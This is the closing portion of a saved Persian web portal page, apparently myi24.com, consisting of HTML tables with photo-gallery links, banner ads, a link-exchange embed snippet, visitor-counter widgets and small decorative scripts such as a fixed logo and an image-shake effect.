				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<font size="2" color="#0000f9">
				<span style="font-size: 8pt; color: rgb(0, 0, 0); text-decoration: none; font-weight: 600;">
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.myi24.com/category/photo-gallery/">
		<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;">
				عکس عکس عکس عکس عکس عکس عکس عکس &nbsp;...</span></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font color="#000000">
				<span style="font-size: 8pt; text-decoration: none; font-weight: 600;">
				<a target="_blank" href="http://www.myi24.com/2008/09/17/niki/">
				<font color="#ff0000"><span style="text-decoration: none;">عکس 
				های خفن نیکی کریمی در جشنواره کن</span></font></a></span></font><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><span lang="en-us"><font color="#0000ec">&nbsp;&nbsp;
				</font></span></font><span style="font-size: 8pt; font-weight: 600;" lang="en-us"><font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						</tbody></table>
				<table id="table32" dir="rtl" width="100%" border="0" cellpadding="0" cellspacing="0">
					<tbody><tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<font size="2" color="#0000f9">
				<span style="font-size: 8pt; color: rgb(0, 0, 0); text-decoration: none; font-weight: 600;">
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.myi24.com/category/photo-gallery/">
		<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;">
				عکس عکس عکس عکس عکس عکس عکس عکس &nbsp;...</span></a></span></font></p></td>
						</tr>
					<tr>
		<td style="font-size: 8pt; font-family: Tahoma;">&nbsp;</td>
					</tr>
					</tbody></table>

<table id="table30" width="100%" align="center" border="0" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#ffcc00" height="25">
		<table id="table38" width="100%" border="0" cellpadding="0" cellspacing="0">
			<tbody><tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="9">&nbsp;&nbsp; </td>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="68">
		<p align="center">
		<img src="a_data/hand.gif" width="35" border="0" height="36"></p></td>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		<div align="center">
			<table id="table39" width="99%" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr>
					<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#000000" height="26">
					<p style="margin-right: 5px;">
					<span lang="fa">
					<font style="font-size: 8pt;" color="#ffffff">
					<a target="_blank" href="http://www.link.myi24.com/webmaster.htm">
					<font color="#ffffff"><span style="text-decoration: none;">با 
					قراردادن باکس در سایت خود </span></font></a></font></span>
					<font color="#ffffff">
					<a target="_blank" href="http://www.link.myi24.com/webmaster.htm">
					<span style="font-size: 8pt; text-decoration: none;">
					<font color="#ffffff">لینک شما رایگان در اینجا قرار خواهد 
					گرفت</font></span></a></font><span style="font-size: 9pt;"><a target="_blank" href="http://www.link.myi24.com/webmaster.htm"><span style="text-decoration: none;"><font color="#ffffff"> 
					.</font></span></a><font color="#ffffff"><span lang="en-us">&nbsp;&nbsp;&nbsp;
					<br>
					</span><b>آمار : + 20<span lang="en-us">0</span>00 </b>
					</font><span lang="en-us"><b><font color="#ffffff">hit</font><font color="#ff0000">
					</font></b><font color="#ffffff">&nbsp;</font></span></span><span style="font-size: 8pt; font-weight: 600;" lang="en-us"><font color="#0000f0"><img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
				</tr>
			</tbody></table>
		</div>
				</td>
			</tr>
		</tbody></table>
		</td>
	</tr>
  <tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" height="15">
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
		<tbody><tr>
			<td>&nbsp;</td>
		</tr>
		<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
		<p align="center">
<b><a target="_blank" href="http://www.taklenz.net/">
		<img alt="" src="a_data/banner22.jpg" width="500" border="0" height="60"></a></b><br>
		<br>
		<a target="_blank" title=" بزرگترین بازار اینترنتی ایرانیان " href="http://www.salamat.i24.ir/">
		<img src="a_data/6-1.gif" width="467" border="0" height="68"></a></p></td>
		</tr>
		<tr>
			<td>&nbsp;</td>
		</tr>
		</tbody></table>
	</td></tr></tbody></table>

<table id="table43" width="100%" align="center" border="0" cellpadding="0" cellspacing="0">
  <tbody>
  <tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" height="15">
      <table id="table49" width="100%" border="0" cellpadding="0" cellspacing="0">
		<tbody><tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#ffcb0c" height="15">
      &nbsp;</td>
		</tr>
		</tbody></table>
	</td></tr>
  </tbody></table>
<table id="table44" width="100%" border="0" cellpadding="0" cellspacing="0">
  <tbody>
  <tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="23" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="255" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="270" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="199" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="134" height="17">
      </td></tr>
  <tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="23" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="255" height="17">
      <textarea rows="2" name="S1" cols="17" dir="ltr">&lt;center&gt;&lt;script language="JavaScript" src="http://link.myi24.com/link.js"&gt;&lt;/script&gt;&lt;/center&gt;</textarea></td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="270">
      <font style="font-size: 8pt;" color="#000000" face="Tahoma">
		<span lang="fa">دریافت</span> 
				کد لينک باکس ایران من <span lang="en-us">:</span></font></td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="199" height="17">
<p align="center"><span class="news_body" id="lblBody3">
				<span class="news_body" id="lblBody4">
				<font color="#000000" face="Tahoma"><b>
				<font style="font-size: 17pt;" size="6" color="#000000" face="Times New Roman">
				<a href="ymsgr:addfriend?myi24">
				<img src="a_data/online.gif" border="0"></a></font></b></font></span></span></p></td></tr>
    <tr><td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
		</td></tr>
    <tr><td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
<!-- URL: http://www.myi24.com -->
<script language="javascript" type="text/javascript" src="a_data/stat.js"></script>
<script language="javascript" type="text/javascript">
persianstat(10071980, 0);
</script><iframe src="a_data/Stats.htm" marginwidth="0" allowtransparency="true" marginheight="0" name="PersianStat" scrolling="no" width="16" frameborder="no" height="16"></iframe>
<!-- /PersianStat -->
		</td></tr>
    <tr><td dir="rtl" style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="134" height="17">
      <p style="margin-left: 10px; margin-right: 10px;">
		<span style="font-size: 9pt;" lang="fa">| آمار </span><span lang="en-us">
		:</span></p></td></tr>
  <tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="23" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="255" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="270" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="13" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="199" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="112" height="17">
      </td></tr>
    <tr><td style="padding: 0px; font-size: 11px; font-family: Tahoma;" width="134" height="17">
      </td></tr></tbody></table>

<table id="table60" width="100%" border="0" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">
      <table id="table62" width="100%" border="0" cellpadding="0" cellspacing="0">
		<tbody><tr>
    <td style="padding: 0px; font-size: 11px; font-family: Tahoma;" bgcolor="#ffcb0c" height="15">
      &nbsp;</td>
		</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">&nbsp;</td>
	</tr>
	<tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;">

<table id="table61" width="100%" border="0" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center"><font style="font-size: 8pt;" face="Tahoma">
		Powered by: <a href="http://www.irandataco.com/">
		<span style="text-decoration: none;"><font color="#ff0000">
		www.irandataco.com</font></span></a> </font></td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center"><a target="_blank" href="http://www.irandataco.com/">
		<img src="a_data/irandata-logo.jpg" width="150" border="0" height="60"></a></td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center"><!-- Begin WebGozar.com Counter code -->
<script type="text/javascript" language="javascript" src="a_data/c.htm"></script><iframe src="a_data/search.txt" border="0" width="1" frameborder="0" height="1"></iframe><div align="center"><iframe border="0" allowtransparency="true" src="a_data/xstat.htm" scrolling="no" width="125" frameborder="0" height="110"></iframe></div>
<noscript><a href="http://www.webgozar.com/counter/stats.aspx?code=963232" target="_blank">&#1570;&#1605;&#1575;&#1585;</a></noscript>
<!-- End WebGozar.com Counter code --></td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
		<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" align="center">
		&nbsp;</td>
	</tr>
</tbody></table>

		</td>
	</tr>
</tbody></table>

<script language="javascript" type="text/javascript">

var Ovr2='';
if(typeof document.compatMode!='undefined'&&document.compatMode!='BackCompat')
	{cot_t1_DOCtp="_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + 0);}";}
else
	{cot_t1_DOCtp="_top:expression(document.body.scrollTop+document.body.clientHeight-this.clientHeight);_left:expression(document.body.scrollLeft + 0);}";}

if(typeof document.compatMode!='undefined'&&document.compatMode!='BackCompat')
	{cot_t1_DOCtp2="_top:expression(document.documentElement.scrollTop-20+document.documentElement.clientHeight-this.clientHeight);}";}
else
	{cot_t1_DOCtp2="_top:expression(document.body.scrollTop-20+document.body.clientHeight-this.clientHeight);}";}
var cot_tl_bodyCSS='* html {background: fixed;background-repeat: repeat;background-position: left bottom;}';
var cot_tl_fixedCSS='#cot_tl_fixed{position:fixed;';
var cot_tl_fixedCSS=cot_tl_fixedCSS+'_position:absolute;';
var cot_tl_fixedCSS=cot_tl_fixedCSS+'bottom:0px;';
var cot_tl_fixedCSS=cot_tl_fixedCSS+'left:0px;';
var cot_tl_fixedCSS=cot_tl_fixedCSS+'clip:rect(0 200 200 0);';
var cot_tl_fixedCSS=cot_tl_fixedCSS+cot_t1_DOCtp;
var cot_tl_popCSS='#cot_tl_pop {background-color: transparent;';
var cot_tl_popCSS=cot_tl_popCSS+'position:fixed;';
var cot_tl_popCSS=cot_tl_popCSS+'_position:absolute;';
var cot_tl_popCSS=cot_tl_popCSS+'height:194px;';
var cot_tl_popCSS=cot_tl_popCSS+'width: 244px;';
var cot_tl_popCSS=cot_tl_popCSS+'right: 120px;';
var cot_tl_popCSS=cot_tl_popCSS+'bottom: 20px;';
var cot_tl_popCSS=cot_tl_popCSS+'overflow: hidden;';
var cot_tl_popCSS=cot_tl_popCSS+'visibility: hidden;';
var cot_tl_popCSS=cot_tl_popCSS+'z-index: 100;';
var cot_tl_popCSS=cot_tl_popCSS+cot_t1_DOCtp2;
document.write('<style type="text/css">'+cot_tl_bodyCSS+cot_tl_fixedCSS+cot_tl_popCSS+'</style>');

function COT(cot_tl_theLogo,cot_tl_LogoType,LogoPosition,theAffiliate)
	{document.write('<div id="cot_tl_fixed">');
	document.write('<a target="_blank" href="http://www.group.myi24.com"><img src="http://www.myi24.com/images/cot32.gif" alt="tips" border="0"></a>');
	document.write('</div>');}


COT("http://www.cdd.ir/cot3.gif", "SC2", "none");

</script><style type="text/css">* html {background: fixed;background-repeat: repeat;background-position: left bottom;}#cot_tl_fixed{position:fixed;_position:absolute;bottom:0px;left:0px;clip:rect(0 200 200 0);_top:expression(document.body.scrollTop+document.body.clientHeight-this.clientHeight);_left:expression(document.body.scrollLeft + 0);}#cot_tl_pop {background-color: transparent;position:fixed;_position:absolute;height:194px;width: 244px;right: 120px;bottom: 20px;overflow: hidden;visibility: hidden;z-index: 100;_top:expression(document.body.scrollTop-20+document.body.clientHeight-this.clientHeight);}</style><div id="cot_tl_fixed"><a target="_blank" href="http://www.group.myi24.com/"><img src="a_data/cot32.gif" alt="tips" border="0"></a></div>
<style>
.shakeimage{
position:relative
}
</style>
<script language="JavaScript1.2">

/*
Shake image script (onMouseover)- 
© Dynamic Drive (www.dynamicdrive.com)
For full source code, usage terms, and 100's more DHTML scripts, visit http://dynamicdrive.com
*/

//configure shake degree (where larger # equals greater shake)
var rector=3

///////DONE EDITTING///////////
var stopit=0 
var a=1

function init(which){
stopit=0
shake=which
shake.style.left=0
shake.style.top=0
}

function rattleimage(){
if ((!document.all&&!document.getElementById)||stopit==1)
return
if (a==1){
shake.style.top=parseInt(shake.style.top)+rector
}
else if (a==2){
shake.style.left=parseInt(shake.style.left)+rector
}
else if (a==3){
shake.style.top=parseInt(shake.style.top)-rector
}
else{
shake.style.left=parseInt(shake.style.left)-rector
}
if (a<4)
a++
else
a=1
setTimeout("rattleimage()",50)
}

function stoprattle(which){
stopit=1
which.style.left=0
which.style.top=0
}

</script>
</body></html>